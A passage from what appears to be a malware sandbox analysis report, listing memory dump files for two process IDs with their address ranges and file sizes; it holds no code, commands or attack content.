                                                    • memory/2088-327-0x00007FFDBECB0000-0x00007FFDBF11E000-memory.dmp

                                                      Filesize

                                                      4.4MB

                                                    • memory/2088-353-0x00007FFDCE260000-0x00007FFDCE274000-memory.dmp

                                                      Filesize

                                                      80KB

                                                    • memory/2088-352-0x00007FFDCDEE0000-0x00007FFDCDF97000-memory.dmp

                                                      Filesize

                                                      732KB

                                                    • memory/2088-351-0x00007FFDCE380000-0x00007FFDCE3AE000-memory.dmp

                                                      Filesize

                                                      184KB

                                                    • memory/2088-350-0x00007FFDD5B20000-0x00007FFDD5B2D000-memory.dmp

                                                      Filesize

                                                      52KB

                                                    • memory/2088-349-0x00007FFDCE3B0000-0x00007FFDCE3C9000-memory.dmp

                                                      Filesize

                                                      100KB

                                                    • memory/2088-348-0x00007FFDBE9A0000-0x00007FFDBEB09000-memory.dmp

                                                      Filesize

                                                      1.4MB

                                                    • memory/2088-347-0x00007FFDD2B70000-0x00007FFDD2B8F000-memory.dmp

                                                      Filesize

                                                      124KB

                                                    • memory/2088-346-0x00007FFDD3530000-0x00007FFDD3549000-memory.dmp

                                                      Filesize

                                                      100KB

                                                    • memory/2088-345-0x00007FFDCE3D0000-0x00007FFDCE3FD000-memory.dmp

                                                      Filesize

                                                      180KB

                                                    • memory/2088-344-0x00007FFDD6BA0000-0x00007FFDD6BAF000-memory.dmp

                                                      Filesize

                                                      60KB

                                                    • memory/2088-343-0x00007FFDCE6E0000-0x00007FFDCE704000-memory.dmp

                                                      Filesize

                                                      144KB

                                                    • memory/2088-342-0x00007FFDD2860000-0x00007FFDD286D000-memory.dmp

                                                      Filesize

                                                      52KB

                                                    • memory/2088-274-0x00007FFDCDEE0000-0x00007FFDCDF97000-memory.dmp

                                                      Filesize

                                                      732KB

                                                    • memory/4504-192-0x000001899FF10000-0x000001899FF18000-memory.dmp

                                                      Filesize

                                                      32KB